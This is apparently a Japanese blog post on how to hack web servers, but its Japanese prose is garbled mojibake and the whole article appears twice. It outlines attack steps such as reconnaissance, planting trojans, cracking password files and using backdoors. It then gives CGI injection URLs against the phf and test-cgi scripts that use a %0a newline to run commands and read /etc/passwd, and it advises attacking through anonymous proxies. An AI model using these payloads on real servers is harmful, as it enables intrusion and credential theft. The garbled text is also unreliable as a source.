¼ç¤Ëtorrent¤ä¥³¥ó¥Ô¥å¡¼¥¿¡¼´ØÏ¢¤Î¥Ö¥í¥°¡©
¥¿¥¤¥È¥ë¤¬Ä¹¤¹¤®¤¿¤Î¤Çû¤¯¤·¤Þ¤·¤¿£÷£÷¡¡¥³¥ó¥Ô¥å¡¼¥¿¤Î¾ðÊó¤äިޱŽÙ¤Î¾ðÊó¤Þ¤Ç¤¤¤í¤¤¤í¤¢¤ê¤Þ¤¹¡¡Áê¸ß¥ê¥ó¥¯¤Ï isig@live.jp¡¡¤Þ¤Ç¥á¡¼¥ë¤¯¤À¤µ¤¤¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¸¡º÷޻޲ŽÄ¤«¤ìÍ褿¤±¤É¾ðÊ󤬤ʤ¤¤È¤¤¤¦¾ì¹ç¤Ï±¦¤Î¥Ö¥í¥°Æâ¸¡º÷¤ÇÄ´¤Ù¤Æ¤ß¤Æ¤¯¤À¤µ¤¤¡¡¡¡¡¡¡¡
Entries
¥Ï¥Ã¥¥ó¥°¤Ë¤Ä¤¤¤Æ
- ¥¸¥ã¥ó¥ë : ¥³¥ó¥Ô¥å¡¼¥¿
- ¥¹¥ì¥Ã¥É¥Æ¡¼¥Þ : ¥×¥í¥°¥é¥ß¥ó¥°
ºòÆü¡Ö¥Ö¥é¥Ã¥Ç¥£¡¦¥Þ¥ó¥Ç¥¤¡×¤Ç¥Ï¥Ã¥¥ó¥°¤ò¤·¤Æ¤¤¤¿¤Î¤Ç¾è¤»¤Æ¤ß¤Þ¤·¤¿
Ť¯¤Ê¤ë¤Î¤Ç¡¡Â³¤¤ò¸«¤ë¤Ç¤ª´ê¤¤¤·¤Þ¤¹
Ť¯¤Ê¤ë¤Î¤Ç¡¡Â³¤¤ò¸«¤ë¤Ç¤ª´ê¤¤¤·¤Þ¤¹
¡Ú¹¶·â¸¶Íý¡Û
Hack¤¹¤ë¤È¤¤¤¦»ö¤Ï¡¢·è¤Ã¤¿¥ë¡¼¥ë¤¬¤¢¤Ã¤¿¤ê¡¢Æñ¤·¤¤»ö¤Ç¤Ï¤¢¤ê¤Þ¤»
¤ó¡£¤·¤«¤·¡¢¤¿¤¤¤Æ¤¤¤Î¥·¥¹¥Æ¥à¤Ë¤Ï¡¢Hack¤¹¤ë¤Î¤Ë4¤Ä¤Î´ðËÜŪ¤Ê»ö¤¬
¤¢¤ë¤È¤¤¤¨¤Þ¤¹¡£¤½¤ì¤é¤òÍý²ò¤¹¤ëɬÍפ¬ÅöÁ³¤¢¤ê¤Þ¤¹¡£
¤½¤Î4¤Ä¤Î´ðËÜ»ö¹à¤È¤Ï¤Ê¤ó¤Ç¤·¤ç¤¦¤«¡©
1.¥¿¡¼¥²¥Ã¥È¤Î¹¶·âÁ°¤Ë¡¢½ÐÍè¤ë¸Â¤ê¤½¤Î¥·¥¹¥Æ¥à¤Ë¤Ä¤¤¤Æ¾ðÊó¤ò¼ý½¸
¤·¤Þ¤¹¡£¤½¤·¤Æ¡¢¥´¡¼¥ë¤ò·è¤á¤Þ¤¹¡£Hack¤·¤Æ²¿¤òÆÀ¤ë¤Î¤«¤ò¹Í¤¨¤Þ
¤¹¡£¡Ê¥¢¥«¥¦¥ó¥È¡©ÈëÌ©¤Î¥Õ¥¡¥¤¥ë¡©¡Ë
2.¥·¥¹¥Æ¥à¤Ë¥¢¥¯¥»¥¹¤·¤Æ¤ß¤Þ¤¹¡£ÌÞÏÀ¡¢¤½¤Î¥Ý¥¤¥ó¥È¤¬´Ö°ã¤¤¤Ê¤¯¡¢
¹¶·â¤¹¤Ù¤Éôʬ¤Ç¤¢¤ë¤È¤¤¤¦»ö¤¬¾ò·ï¤Ç¤¹¡£¤Ä¤Þ¤ê¡¢ÉáÄ̤Υ桼¥¶¡¼
¤È¤·¤Æ¥¢¥¯¥»¥ë¤¹¤ë¤Î¤«¡¢FTP¤Ê¤Î¤«¡¢Sendmail¤Î¥Ð¥°¤ò¤Ä¤¯¤Î¤«¡¢¤È
¤¤¤Ã¤¿»ö¤Ç¤¹¡£¤¤¤º¤ì¤Ë¤·¤í¡¢Ä¾ÀÜ¡¢´ÖÀܤ˥¢¥¯¥»¥¹¤Ç¤¤Ê¤±¤ì¤Ð¡¢
²¿¤â»Ï¤Þ¤ê¤Þ¤»¤ó¡£
3.¥·¥¹¥Æ¥à¤Ø¤Î¥¢¥¯¥»¥¹¤ò¤Ø¤Æ¡¢¤½¤ÎÃæ¤ËÆþ¤ì¤ë¤Î¤Ê¤é¡¢¼¡¤Ë¥È¥í¥¤¤Î
ÌÚÇϤòÃíÆþ¤·¤¿¤ê¡¢¥Ñ¥¹¥ï¡¼¥É¥Õ¥¡¥¤¥ë¤ò¥³¥Ô¡¼¤·¥¯¥é¥Ã¥¯¤·¤Þ¤¹¡£
¤½¤·¤Æ¡¢¤½¤Î¥·¥¹¥Æ¥à¤Î´ÉÍý¼Ô¤ä¥æ¡¼¥¶¡¼¤¬ÈëÌ©¤Ë¤·¤Æ¤ª¤¤¿¤¤¥Õ¥¡
¥¤¥ë¤Ê¤É¤ò¸«ÉÕ¤±¤ë»ö¤¬¤Ç¤¤Þ¤¹¡£
4.±£¤µ¤ì¤¿·ÐÏ©¡¢¤Ä¤Þ¤êBackdoor¤Îõº÷¤â¡¢¤â¤¦¤Ò¤È¤Ä¤ÎÊýË¡¤Ç¤¹¡£
¥·¥¹¥Æ¥à´ÉÍý¼Ô¤ä¡¢¥µ¥¤¥È¤Î´ÉÍý¼Ô¤¬¡¢¼«Ê¬¡Ê¤Þ¤¿¤Ï¥¹¥¿¥Ã¥Õ¡Ë¤À¤±
¤Ë²òÊü¤·¤Æ¤¤¤ëÆþ¤ê¸ý¤òÀߤ±¤ë»ö¤¬Â¿¤¤¤Î¤Ç¤¹¡£
¤·¤«¤·¡¢¤½¤Î·ÐÏ©¤Ø¤Î¥¢¥¯¥»¥¹¤ÏµÏ¿¤µ¤ì¡¢¿¯Æþ¤Î¸å¤ËËõ¾Ã¤µ¤ì¤ë²Ä
ǽÀ¤¬¤¢¤ê¤Þ¤¹¡£¤·¤«¤·¡¢¤³¤ì¤â¤Ò¤È¤Ä¤ÎÊýË¡¤Ç¤¹¡£
¤³¤Î4¤Ä¤Î»öÊÁ¤ò¡¢¿¿¤Ë¿È¤Ë¤Ä¤±¤ë¤Î¤Ê¤é¤Ð¡¢Hack¤Ë¤µ¤·¤Æº¤Æñ¤Ï¤¢¤ê¤Þ
¤»¤ó¡£¤Ç¤Ï¡¢¼ÂºÝ¤Ë¹Ô¤ï¤ì¤¿²áµî¤Î»öÎã¤ò¸«¤Æ¡¢¹Í¤¨¤Æ¤ß¤Þ¤·¤ç¤¦¡£
¡¦¹¶·âʼ´ï¤ËÊѿȤ¹¤ë¥×¥é¥¦¥¶¥½¥Õ¥È no.1
Web¥µ¡¼¥Ð¡¼¤Ï¡¢Ä̾ïroot¡Ê¥·¥¹¥Æ¥à´ÉÍý¼Ô¡Ë´Ä¶²¼¤Çưºî¤·¤Æ¤¤¤ë»ö¤¬
¿¤¤¤Ç¤¹¡£¤È¤¤¤¦»ö¤Ï¡¢Web¥µ¡¼¥Ð¡¼¤Ë¡¢²¿¤«¤ò¤µ¤»¤ë»ö¤Ï¡¢¤Ä¤Þ¤ê¤Ï¡¢
¥·¥¹¥Æ¥à´ÉÍý¼Ô¤¬¡¢¤½¤ì¤ò¼Â¹Ô¤·¤Æ¤¤¤ë»ö¤ò°ÕÌ£¤·¤Þ¤¹¡£
¤µ¤Æ¡¢Web¥µ¡¼¥Ð¡¼¤Ï¡¢ÉÔÆÃÄê¿¿ô¤Î¿Í¤Ë¸«¤Æ¤â¤é¤¦¤¿¤á¤Ë¤¢¤ê¤Þ¤¹¡£Éá
Ä̤Ϥ½¤¦»×¤¤¤Þ¤¹¡£¹¶·â¸¶Íý¤Ë¤¢¤ë¤è¤¦¤Ë¡¢¥·¥¹¥Æ¥à¤Ø¤Î¥¢¥¯¥»¥¹¤¹¤ë
ÊýË¡¤È¼êÃʤ¬¤¢¤ë»ö¤Ë¤Ê¤ê¤Þ¤¹¡£
IE¤ä¥Í¥¹¥±¤¬¤½¤Î¥Ä¡¼¥ë¤Ç¤¹¡£
Á°½Ò¤Î¤È¤ª¤ê¡¢Web¥µ¡¼¥Ð¡¼¤¬root´Ä¶²¼¤Ë¤¢¤ë»ö¤¬¡¢¤³¤Î¥»¥¥å¥ê¥Æ¥£
¥ê¥¹¥¯¤ò¡¢¤µ¤é¤ËÁýÂ礵¤»¤Þ¤¹¡£¤Ç¤Ï¡¢¤É¤¦¤ä¤ë¤Î¤Ç¤·¤ç¤¦¤«¡£
°Ê²¼¤Ë¡¢²áµî¤Ë¤ª¤³¤Ã¤¿¥¢¥¿¥Ã¥¯¤ÎÊýË¡¤Ë¤Ä¤¤¤Æ¡¢²òÀ⤷¤Þ¤¹¡£
¡ÚPHF¥¢¥¿¥Ã¥¯¡Û
¸½ºß¡¢¤³¤ÎÊýË¡¤Ï¡¢¤«¤Ê¤êÄÄÉå¤È¤Ê¤Ã¤Æ¤·¤Þ¤¤¤Þ¤·¤¿¤¬¡¢Web¥µ¡¼¥Ð¡¼¤Î
Hack¤Ë´Ø¤·¤Æ¤Ï¡¢¤½¤ÎÊýË¡¤Î´ðËܤò¾Ýħ¤¹¤ë¤è¤¦¤Ê¥¢¥¿¥Ã¥¯¤Ç¤¹¡£
PHF¥Õ¥¡¥¤¥ë¤Ï¡¢CGI¥¹¥¯¥ê¥×¥È¤Î»öÎã¤È¤·¤Æ¡¢¥Ç¥Õ¥©¥ë¥È¤Ç¥¤¥ó¥¹¥È¡¼
¥ë¤µ¤ì¤ë¥Õ¥¡¥¤¥ë¤Ç¡¢Phonebook·Á¼°¤Î¥ê¥¹¥È¤òUPDATE¤¹¤ë¤â¤Î¤Ç¤¹¡£
CGI¤ò¤½¤ÎWeb¥µ¡¼¥Ð¡¼¤Ë¥¤¥ó¥¹¥È¡¼¥ë¤¹¤ë¤È,/cgi-bin/¤Î¥Ç¥£¥ì¥¯¥È¥ê
¤ÎÃæ¤Ë¡¢phf¤Ïºî¤é¤ì¤Þ¤¹¡£¤½¤·¤Æ¡¢¤½¤Î»ö¤òÅö½é¡¢¥·¥¹¥Æ¥à´ÉÍý¼Ô¤ÏÃÎ
¤é¤Ê¤«¤Ã¤¿¤Î¤Ç¤¹¡£
Unix¥µ¡¼¥Ð¡¼¤Ë¤ª¤±¤ë¥¢¥¿¥Ã¥¯ÊýË¡¤È¤·¤Æ¤Ï¡¢°Ê²¼¤Î¤è¤¦¤Ê¤â¤Î¤¬¤¢¤ê
¤Þ¤¹¡£
http://¡ü¡ü¡ü¡ü.com/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd
¢¬ ¥¿¡¼¥²¥Ã¥È¥µ¥¤¥È¤ÎURL¡¦¥É¥á¥¤¥ó̾
¤³¤ì¤Ï¡¢¥×¥é¥¦¥¶¥½¥Õ¥È¤Î¡Ö¥¢¥É¥ì¥¹¡×¤È¤«¡Ö¾ì½ê¡×Åù¤ÎURL¤¬¸½¤ì¤ë¾ì
½ê¤Ë¡¢¤¤¤ì¤Æ¥ê¥¿¡¼¥ó¤òᤱ¤ÐOK¤Ç¤¹¡£
¤Þ¤¿¡¢Æ±Íͤʾ¤Î¥¢¥¿¥Ã¥¯½ñ¼°¤È¤·¤Æ¤Ï¡¢°Ê²¼¤Ç¤¹¡£
http://¡ü¡ü¡ü¡ü.com/cgi-bin/phf?%0aid==haqr=
¡Êid¥³¥Þ¥ó¥É¤Î¼Â¹Ô¡Ë
http://¡ü¡ü¡ü¡ü.com/cgi-bin/phf?%0als%20-la%20%7E¢¥¢¥¢¥==
¥æ¡¼¥¶¡¼¤ÎID¡Ê/~xxxxx ¤Ë¤è¤¯¸«¤é¤ì¤ë¡Ë¢¬¡Êls -la ~someuser ¥³¥Þ¥ó¥É¤Î¼Â¹Ô¡Ë
¸½ºß¤Ç¤â¡¢¤³¤Î¹¶·â¤¬²Äǽ¤Ê¥Þ¥Ì¥±¤Ê¥Þ¥·¥ó¤Ï¤Ê¤¤¤È»×¤¤¤Þ¤¹¤¬¡¢¤¢¤ì
¤Ð¤È¤Æ¤â¥é¥Ã¥¡¼¤Ç¤Ï¤Ê¤¤¤Ç¤·¤ç¤¦¤«¡£ÌÞÏÀ¡¢¥¢¥¿¥Ã¥¯¼Â¹Ô¤Î¾ì¹ç¤Ï¡¢
ƿ̾À¤Î¹â¤¤Proxy¥µ¡¼¥Ð¡¼·Ðͳ¤Ç¤Î¹¶·â¤¬¾ï¼±¤Ç¤¹¡£
¡¦¹¶·âʼ´ï¤ËÊѿȤ¹¤ë¥×¥é¥¦¥¶¥½¥Õ¥È no.2
¡Ú¡ÉTEST¡É¥¢¥¿¥Ã¥¯¡Û
Ʊ¤¸¤¯CGI¥¹¥¯¥ê¥×¥È¤ÎÃæ¤Ç¡¢Test ¥¹¥¯¥ê¥×¥È¤È¤¤¤¦¤Î¤¬¤¢¤ê¤Þ¤¹¡£
½ñ¼°,¤È¤·¤Æ¤Ï¡¢°Ê²¼¤Ç¤¹¡£
http://¡ü¡ü¡ü¡ü.com/cgi-bin/test-cgi?\whatever
¤â¤·¡¢¤³¤Î¥¹¥¯¥ê¥×¥È¤¬ºï½ü¤µ¤ì¤º¤Ë¥µ¡¼¥Ð¡¼¤Ë¤¢¤ì¤Ð¡¢¤¤Ã¤È¤³¤ó¤Ê
±þÅú¤¬Ê֤äƤ¯¤ë¤Ç¤·¤ç¤¦¡£
CGI/1.0 test script report:
argc is 0. argv is .
SERVER_SOFTWARE = NCSA/1.4B
SERVER_NAME = thegnome.com
GATEWAY_INTERFACE = CGI/1.1
SERVER_PROTOCOL = HTTP/1.0
SERVER_PORT = 80
REQUEST_METHOD = GET
HTTP_ACCEPT = text/plain, application/x-html, application/html,
text/html, text/x-html
PATH_INFO =
PATH_TRANSLATED =
SCRIPT_NAME = /cgi-bin/test-cgi
QUERY_STRING = whatever
REMOTE_HOST = fifth.column.gov
REMOTE_ADDR = 200.200.200.200
REMOTE_USER =
AUTH_TYPE =
CONTENT_TYPE =
CONTENT_LENGTH =
¤É¤³¤«¤Ç¤ß¤¿»ö¤¢¤ë¤È»×¤¤¤Þ¤»¤ó¤«¡£
¤µ¤Æ¡¢PHF¤Î¤È¤³¤í¤Ç¤â½Ð¤Þ¤·¤¿¤¬¡¢¡Ö0a¡×¥¥ã¥é¥¯¥¿¤ò¤³¤³¤Ç¤â¤¦1ÅÙ
»È¤¤¤Þ¤¹¡£
¤È¤³¤í¤Ç¡¢¤³¤Î[¡Ö0a¡×¥¥ã¥é¥¯¥¿¤Ê¤ó¤Ç¤¹¤¬¡¢¼Â¤Ë¤ª¤â¤·¤í¤¤Æ¯¤¤ò¤¹
¤ë¤é¤·¤¤¤Î¤Ç¤¹¡£Â¾¤Î¥Õ¥¡¥¤¥ë¤ò°ú¤ÃÄ¥¤Ã¤Æ¤¯¤ë¤È¤¤¤¦ºîÍѤǤ¹¡£¤³¤ì
¤òÍøÍѤ·¤Æ¡¢¥Ñ¥¹¥ï¡¼¥É¥Õ¥¡¥¤¥ë¤ò±ÜÍ÷¤¹¤ë¤Ë¤Ï°Ê²¼¤Î½ñ¼°¤Ë¤Ê¤ê¤Þ¤¹¡£
http://thegnome.com/cgi-bin/test-cgi?\help&0a/bin/cat%20/etc/passwd
¤â¤·¡¢¤³¤Î¡Ö0a¡×¥¥ã¥é¥¯¥¿¤Îʸ»úÎó¤ÎºîÍѤ¬¥¥ã¥ó¥»¥ë¤µ¤ì¤Æ¤¤¤Ê¤±
¤ì¤Ð¡¢¤³¤ì¤â¤Þ¤¿Í¸ú¤ÊÊýË¡¤Ç¤¹¡£
Hack¤¹¤ë¤È¤¤¤¦»ö¤Ï¡¢·è¤Ã¤¿¥ë¡¼¥ë¤¬¤¢¤Ã¤¿¤ê¡¢Æñ¤·¤¤»ö¤Ç¤Ï¤¢¤ê¤Þ¤»
¤ó¡£¤·¤«¤·¡¢¤¿¤¤¤Æ¤¤¤Î¥·¥¹¥Æ¥à¤Ë¤Ï¡¢Hack¤¹¤ë¤Î¤Ë4¤Ä¤Î´ðËÜŪ¤Ê»ö¤¬
¤¢¤ë¤È¤¤¤¨¤Þ¤¹¡£¤½¤ì¤é¤òÍý²ò¤¹¤ëɬÍפ¬ÅöÁ³¤¢¤ê¤Þ¤¹¡£
¤½¤Î4¤Ä¤Î´ðËÜ»ö¹à¤È¤Ï¤Ê¤ó¤Ç¤·¤ç¤¦¤«¡©
1.¥¿¡¼¥²¥Ã¥È¤Î¹¶·âÁ°¤Ë¡¢½ÐÍè¤ë¸Â¤ê¤½¤Î¥·¥¹¥Æ¥à¤Ë¤Ä¤¤¤Æ¾ðÊó¤ò¼ý½¸
¤·¤Þ¤¹¡£¤½¤·¤Æ¡¢¥´¡¼¥ë¤ò·è¤á¤Þ¤¹¡£Hack¤·¤Æ²¿¤òÆÀ¤ë¤Î¤«¤ò¹Í¤¨¤Þ
¤¹¡£¡Ê¥¢¥«¥¦¥ó¥È¡©ÈëÌ©¤Î¥Õ¥¡¥¤¥ë¡©¡Ë
2.¥·¥¹¥Æ¥à¤Ë¥¢¥¯¥»¥¹¤·¤Æ¤ß¤Þ¤¹¡£ÌÞÏÀ¡¢¤½¤Î¥Ý¥¤¥ó¥È¤¬´Ö°ã¤¤¤Ê¤¯¡¢
¹¶·â¤¹¤Ù¤Éôʬ¤Ç¤¢¤ë¤È¤¤¤¦»ö¤¬¾ò·ï¤Ç¤¹¡£¤Ä¤Þ¤ê¡¢ÉáÄ̤Υ桼¥¶¡¼
¤È¤·¤Æ¥¢¥¯¥»¥ë¤¹¤ë¤Î¤«¡¢FTP¤Ê¤Î¤«¡¢Sendmail¤Î¥Ð¥°¤ò¤Ä¤¯¤Î¤«¡¢¤È
¤¤¤Ã¤¿»ö¤Ç¤¹¡£¤¤¤º¤ì¤Ë¤·¤í¡¢Ä¾ÀÜ¡¢´ÖÀܤ˥¢¥¯¥»¥¹¤Ç¤¤Ê¤±¤ì¤Ð¡¢
²¿¤â»Ï¤Þ¤ê¤Þ¤»¤ó¡£
3.¥·¥¹¥Æ¥à¤Ø¤Î¥¢¥¯¥»¥¹¤ò¤Ø¤Æ¡¢¤½¤ÎÃæ¤ËÆþ¤ì¤ë¤Î¤Ê¤é¡¢¼¡¤Ë¥È¥í¥¤¤Î
ÌÚÇϤòÃíÆþ¤·¤¿¤ê¡¢¥Ñ¥¹¥ï¡¼¥É¥Õ¥¡¥¤¥ë¤ò¥³¥Ô¡¼¤·¥¯¥é¥Ã¥¯¤·¤Þ¤¹¡£
¤½¤·¤Æ¡¢¤½¤Î¥·¥¹¥Æ¥à¤Î´ÉÍý¼Ô¤ä¥æ¡¼¥¶¡¼¤¬ÈëÌ©¤Ë¤·¤Æ¤ª¤¤¿¤¤¥Õ¥¡
¥¤¥ë¤Ê¤É¤ò¸«ÉÕ¤±¤ë»ö¤¬¤Ç¤¤Þ¤¹¡£
4.±£¤µ¤ì¤¿·ÐÏ©¡¢¤Ä¤Þ¤êBackdoor¤Îõº÷¤â¡¢¤â¤¦¤Ò¤È¤Ä¤ÎÊýË¡¤Ç¤¹¡£
¥·¥¹¥Æ¥à´ÉÍý¼Ô¤ä¡¢¥µ¥¤¥È¤Î´ÉÍý¼Ô¤¬¡¢¼«Ê¬¡Ê¤Þ¤¿¤Ï¥¹¥¿¥Ã¥Õ¡Ë¤À¤±
¤Ë²òÊü¤·¤Æ¤¤¤ëÆþ¤ê¸ý¤òÀߤ±¤ë»ö¤¬Â¿¤¤¤Î¤Ç¤¹¡£
¤·¤«¤·¡¢¤½¤Î·ÐÏ©¤Ø¤Î¥¢¥¯¥»¥¹¤ÏµÏ¿¤µ¤ì¡¢¿¯Æþ¤Î¸å¤ËËõ¾Ã¤µ¤ì¤ë²Ä
ǽÀ¤¬¤¢¤ê¤Þ¤¹¡£¤·¤«¤·¡¢¤³¤ì¤â¤Ò¤È¤Ä¤ÎÊýË¡¤Ç¤¹¡£
¤³¤Î4¤Ä¤Î»öÊÁ¤ò¡¢¿¿¤Ë¿È¤Ë¤Ä¤±¤ë¤Î¤Ê¤é¤Ð¡¢Hack¤Ë¤µ¤·¤Æº¤Æñ¤Ï¤¢¤ê¤Þ
¤»¤ó¡£¤Ç¤Ï¡¢¼ÂºÝ¤Ë¹Ô¤ï¤ì¤¿²áµî¤Î»öÎã¤ò¸«¤Æ¡¢¹Í¤¨¤Æ¤ß¤Þ¤·¤ç¤¦¡£
¡¦¹¶·âʼ´ï¤ËÊѿȤ¹¤ë¥×¥é¥¦¥¶¥½¥Õ¥È no.1
Web¥µ¡¼¥Ð¡¼¤Ï¡¢Ä̾ïroot¡Ê¥·¥¹¥Æ¥à´ÉÍý¼Ô¡Ë´Ä¶²¼¤Çưºî¤·¤Æ¤¤¤ë»ö¤¬
¿¤¤¤Ç¤¹¡£¤È¤¤¤¦»ö¤Ï¡¢Web¥µ¡¼¥Ð¡¼¤Ë¡¢²¿¤«¤ò¤µ¤»¤ë»ö¤Ï¡¢¤Ä¤Þ¤ê¤Ï¡¢
¥·¥¹¥Æ¥à´ÉÍý¼Ô¤¬¡¢¤½¤ì¤ò¼Â¹Ô¤·¤Æ¤¤¤ë»ö¤ò°ÕÌ£¤·¤Þ¤¹¡£
¤µ¤Æ¡¢Web¥µ¡¼¥Ð¡¼¤Ï¡¢ÉÔÆÃÄê¿¿ô¤Î¿Í¤Ë¸«¤Æ¤â¤é¤¦¤¿¤á¤Ë¤¢¤ê¤Þ¤¹¡£Éá
Ä̤Ϥ½¤¦»×¤¤¤Þ¤¹¡£¹¶·â¸¶Íý¤Ë¤¢¤ë¤è¤¦¤Ë¡¢¥·¥¹¥Æ¥à¤Ø¤Î¥¢¥¯¥»¥¹¤¹¤ë
ÊýË¡¤È¼êÃʤ¬¤¢¤ë»ö¤Ë¤Ê¤ê¤Þ¤¹¡£
IE¤ä¥Í¥¹¥±¤¬¤½¤Î¥Ä¡¼¥ë¤Ç¤¹¡£
Á°½Ò¤Î¤È¤ª¤ê¡¢Web¥µ¡¼¥Ð¡¼¤¬root´Ä¶²¼¤Ë¤¢¤ë»ö¤¬¡¢¤³¤Î¥»¥¥å¥ê¥Æ¥£
¥ê¥¹¥¯¤ò¡¢¤µ¤é¤ËÁýÂ礵¤»¤Þ¤¹¡£¤Ç¤Ï¡¢¤É¤¦¤ä¤ë¤Î¤Ç¤·¤ç¤¦¤«¡£
°Ê²¼¤Ë¡¢²áµî¤Ë¤ª¤³¤Ã¤¿¥¢¥¿¥Ã¥¯¤ÎÊýË¡¤Ë¤Ä¤¤¤Æ¡¢²òÀ⤷¤Þ¤¹¡£
¡ÚPHF¥¢¥¿¥Ã¥¯¡Û
¸½ºß¡¢¤³¤ÎÊýË¡¤Ï¡¢¤«¤Ê¤êÄÄÉå¤È¤Ê¤Ã¤Æ¤·¤Þ¤¤¤Þ¤·¤¿¤¬¡¢Web¥µ¡¼¥Ð¡¼¤Î
Hack¤Ë´Ø¤·¤Æ¤Ï¡¢¤½¤ÎÊýË¡¤Î´ðËܤò¾Ýħ¤¹¤ë¤è¤¦¤Ê¥¢¥¿¥Ã¥¯¤Ç¤¹¡£
PHF¥Õ¥¡¥¤¥ë¤Ï¡¢CGI¥¹¥¯¥ê¥×¥È¤Î»öÎã¤È¤·¤Æ¡¢¥Ç¥Õ¥©¥ë¥È¤Ç¥¤¥ó¥¹¥È¡¼
¥ë¤µ¤ì¤ë¥Õ¥¡¥¤¥ë¤Ç¡¢Phonebook·Á¼°¤Î¥ê¥¹¥È¤òUPDATE¤¹¤ë¤â¤Î¤Ç¤¹¡£
CGI¤ò¤½¤ÎWeb¥µ¡¼¥Ð¡¼¤Ë¥¤¥ó¥¹¥È¡¼¥ë¤¹¤ë¤È,/cgi-bin/¤Î¥Ç¥£¥ì¥¯¥È¥ê
¤ÎÃæ¤Ë¡¢phf¤Ïºî¤é¤ì¤Þ¤¹¡£¤½¤·¤Æ¡¢¤½¤Î»ö¤òÅö½é¡¢¥·¥¹¥Æ¥à´ÉÍý¼Ô¤ÏÃÎ
¤é¤Ê¤«¤Ã¤¿¤Î¤Ç¤¹¡£
Unix¥µ¡¼¥Ð¡¼¤Ë¤ª¤±¤ë¥¢¥¿¥Ã¥¯ÊýË¡¤È¤·¤Æ¤Ï¡¢°Ê²¼¤Î¤è¤¦¤Ê¤â¤Î¤¬¤¢¤ê
¤Þ¤¹¡£
http://¡ü¡ü¡ü¡ü.com/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd
¢¬ ¥¿¡¼¥²¥Ã¥È¥µ¥¤¥È¤ÎURL¡¦¥É¥á¥¤¥ó̾
¤³¤ì¤Ï¡¢¥×¥é¥¦¥¶¥½¥Õ¥È¤Î¡Ö¥¢¥É¥ì¥¹¡×¤È¤«¡Ö¾ì½ê¡×Åù¤ÎURL¤¬¸½¤ì¤ë¾ì
½ê¤Ë¡¢¤¤¤ì¤Æ¥ê¥¿¡¼¥ó¤òᤱ¤ÐOK¤Ç¤¹¡£
¤Þ¤¿¡¢Æ±Íͤʾ¤Î¥¢¥¿¥Ã¥¯½ñ¼°¤È¤·¤Æ¤Ï¡¢°Ê²¼¤Ç¤¹¡£
http://¡ü¡ü¡ü¡ü.com/cgi-bin/phf?%0aid==haqr=
¡Êid¥³¥Þ¥ó¥É¤Î¼Â¹Ô¡Ë
http://¡ü¡ü¡ü¡ü.com/cgi-bin/phf?%0als%20-la%20%7E¢¥¢¥¢¥==
¥æ¡¼¥¶¡¼¤ÎID¡Ê/~xxxxx ¤Ë¤è¤¯¸«¤é¤ì¤ë¡Ë¢¬¡Êls -la ~someuser ¥³¥Þ¥ó¥É¤Î¼Â¹Ô¡Ë
¸½ºß¤Ç¤â¡¢¤³¤Î¹¶·â¤¬²Äǽ¤Ê¥Þ¥Ì¥±¤Ê¥Þ¥·¥ó¤Ï¤Ê¤¤¤È»×¤¤¤Þ¤¹¤¬¡¢¤¢¤ì
¤Ð¤È¤Æ¤â¥é¥Ã¥¡¼¤Ç¤Ï¤Ê¤¤¤Ç¤·¤ç¤¦¤«¡£ÌÞÏÀ¡¢¥¢¥¿¥Ã¥¯¼Â¹Ô¤Î¾ì¹ç¤Ï¡¢
ƿ̾À¤Î¹â¤¤Proxy¥µ¡¼¥Ð¡¼·Ðͳ¤Ç¤Î¹¶·â¤¬¾ï¼±¤Ç¤¹¡£
¡¦¹¶·âʼ´ï¤ËÊѿȤ¹¤ë¥×¥é¥¦¥¶¥½¥Õ¥È no.2
¡Ú¡ÉTEST¡É¥¢¥¿¥Ã¥¯¡Û
Ʊ¤¸¤¯CGI¥¹¥¯¥ê¥×¥È¤ÎÃæ¤Ç¡¢Test ¥¹¥¯¥ê¥×¥È¤È¤¤¤¦¤Î¤¬¤¢¤ê¤Þ¤¹¡£
½ñ¼°,¤È¤·¤Æ¤Ï¡¢°Ê²¼¤Ç¤¹¡£
http://¡ü¡ü¡ü¡ü.com/cgi-bin/test-cgi?\whatever
¤â¤·¡¢¤³¤Î¥¹¥¯¥ê¥×¥È¤¬ºï½ü¤µ¤ì¤º¤Ë¥µ¡¼¥Ð¡¼¤Ë¤¢¤ì¤Ð¡¢¤¤Ã¤È¤³¤ó¤Ê
±þÅú¤¬Ê֤äƤ¯¤ë¤Ç¤·¤ç¤¦¡£
CGI/1.0 test script report:
argc is 0. argv is .
SERVER_SOFTWARE = NCSA/1.4B
SERVER_NAME = thegnome.com
GATEWAY_INTERFACE = CGI/1.1
SERVER_PROTOCOL = HTTP/1.0
SERVER_PORT = 80
REQUEST_METHOD = GET
HTTP_ACCEPT = text/plain, application/x-html, application/html,
text/html, text/x-html
PATH_INFO =
PATH_TRANSLATED =
SCRIPT_NAME = /cgi-bin/test-cgi
QUERY_STRING = whatever
REMOTE_HOST = fifth.column.gov
REMOTE_ADDR = 200.200.200.200
REMOTE_USER =
AUTH_TYPE =
CONTENT_TYPE =
CONTENT_LENGTH =
¤É¤³¤«¤Ç¤ß¤¿»ö¤¢¤ë¤È»×¤¤¤Þ¤»¤ó¤«¡£
¤µ¤Æ¡¢PHF¤Î¤È¤³¤í¤Ç¤â½Ð¤Þ¤·¤¿¤¬¡¢¡Ö0a¡×¥¥ã¥é¥¯¥¿¤ò¤³¤³¤Ç¤â¤¦1ÅÙ
»È¤¤¤Þ¤¹¡£
¤È¤³¤í¤Ç¡¢¤³¤Î[¡Ö0a¡×¥¥ã¥é¥¯¥¿¤Ê¤ó¤Ç¤¹¤¬¡¢¼Â¤Ë¤ª¤â¤·¤í¤¤Æ¯¤¤ò¤¹
¤ë¤é¤·¤¤¤Î¤Ç¤¹¡£Â¾¤Î¥Õ¥¡¥¤¥ë¤ò°ú¤ÃÄ¥¤Ã¤Æ¤¯¤ë¤È¤¤¤¦ºîÍѤǤ¹¡£¤³¤ì
¤òÍøÍѤ·¤Æ¡¢¥Ñ¥¹¥ï¡¼¥É¥Õ¥¡¥¤¥ë¤ò±ÜÍ÷¤¹¤ë¤Ë¤Ï°Ê²¼¤Î½ñ¼°¤Ë¤Ê¤ê¤Þ¤¹¡£
http://thegnome.com/cgi-bin/test-cgi?\help&0a/bin/cat%20/etc/passwd
¤â¤·¡¢¤³¤Î¡Ö0a¡×¥¥ã¥é¥¯¥¿¤Îʸ»úÎó¤ÎºîÍѤ¬¥¥ã¥ó¥»¥ë¤µ¤ì¤Æ¤¤¤Ê¤±
¤ì¤Ð¡¢¤³¤ì¤â¤Þ¤¿Í¸ú¤ÊÊýË¡¤Ç¤¹¡£
4·ï¤Î¥³¥á¥ó¥È
